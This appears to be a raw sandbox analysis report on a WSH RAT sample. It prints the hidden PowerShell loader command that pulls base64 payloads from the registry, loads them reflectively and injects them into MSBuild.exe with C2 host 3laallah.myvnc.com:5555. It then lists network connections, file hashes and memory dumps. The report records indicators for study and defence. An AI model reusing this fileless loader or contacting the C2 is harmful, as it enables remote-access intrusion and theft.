"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 3laallah.myvnc.com 5555 "WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands" 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 3laallah.myvnc.com | udp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
Files
memory/3248-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg
| MD5 | 0e5411d7ecba9a435afda71c6c39d8fd |
| SHA1 | 2d6812052bf7be1b5e213e1d813ae39faa07284c |
| SHA256 | cb68d50df5817e51ec5b2f72893dc4c749bf3504519107e0a78dda84d55f09e2 |
| SHA512 | 903ac6e5c8a12607af267b54bcbbedfa5542c5b4f7ea289ab7c6a32a424d5b846ae406d830cb4ad48e2b46f92c504163c0856af8c3e09685a8855f39f616ddb1 |
memory/640-117-0x0000000000000000-mapping.dmp
memory/640-119-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-118-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-120-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-122-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-121-0x000001CEFCBE0000-0x000001CEFCBE2000-memory.dmp
memory/640-123-0x000001CEFCBE3000-0x000001CEFCBE5000-memory.dmp
memory/640-124-0x000001CEFCB30000-0x000001CEFCB31000-memory.dmp
memory/640-125-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-127-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-128-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-129-0x000001CEFCFF0000-0x000001CEFCFF1000-memory.dmp
memory/640-130-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/640-138-0x000001CEFAC30000-0x000001CEFAC32000-memory.dmp
memory/3964-139-0x0000000000000000-mapping.dmp
memory/3964-141-0x00000188E7760000-0x00000188E7762000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8a313b70fd641fc4e6fffb40391d0b4d |
| SHA1 | 22684fe19ecd7943ac18e622db0d7f161db500e8 |
| SHA256 | bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911 |
| SHA512 | 5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246 |
memory/3964-142-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-143-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-144-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-146-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/640-148-0x000001CEFCBE6000-0x000001CEFCBE8000-memory.dmp
memory/3964-149-0x00000188FFD80000-0x00000188FFD82000-memory.dmp
memory/3964-150-0x00000188FFD83000-0x00000188FFD85000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c11352e9b52ab4fa0bd0da96e0b367ef |
| SHA1 | faaf691c47f77bcdbba3fcaf0407ea658d523e04 |
| SHA256 | 81a49626a224b04139e4f944f8959776774fad6320a2ecff90d35db9b3dfd799 |
| SHA512 | bb92760bc671186344c357bfb32ace77ab42c6fe7f92aa3130cb32da6344dfc3f5c0722b8c88be8425415a04dee4ef7fc87b285de0944ea76840fcb7ca0ae0a7 |
memory/3964-152-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-153-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-155-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-163-0x00000188E7760000-0x00000188E7762000-memory.dmp
memory/3964-164-0x00000188FFD86000-0x00000188FFD88000-memory.dmp
memory/880-165-0x0000000000000000-mapping.dmp
memory/880-167-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-166-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-168-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-169-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-171-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9e553db99a1bba5396603f328f2454f0 |
| SHA1 | 0ad968e75269c5de6ee265ec92415349c018a49b |
| SHA256 | ab236fbb9ee8ac08acb493df5e0210d6c826a5aec10f7067fa366ce2602e551b |
| SHA512 | f176d563c0ae89f6d8d7ec4eb17421f911243cf9a8c102f89921b2901f70f02ac979246e7a2c93562c8c9703189aa35790b1481cf4a42253f1ffdc7216135a10 |
memory/880-174-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-175-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-176-0x000001DCDAA80000-0x000001DCDAA82000-memory.dmp
memory/880-177-0x000001DCDAA83000-0x000001DCDAA85000-memory.dmp
memory/880-179-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/880-183-0x000001DCC0CB0000-0x000001DCC0CB3000-memory.dmp
memory/1928-184-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1928-185-0x00000000004071AE-mapping.dmp
memory/880-186-0x000001DCC09D0000-0x000001DCC09D2000-memory.dmp
memory/1928-189-0x0000000005CB0000-0x0000000005CB1000-memory.dmp
memory/1928-190-0x00000000057B0000-0x00000000057B1000-memory.dmp
memory/1928-191-0x00000000058D0000-0x00000000058D1000-memory.dmp
memory/1928-192-0x0000000005760000-0x0000000005761000-memory.dmp
memory/880-193-0x000001DCDAA86000-0x000001DCDAA88000-memory.dmp
memory/1928-194-0x00000000057B0000-0x0000000005CAE000-memory.dmp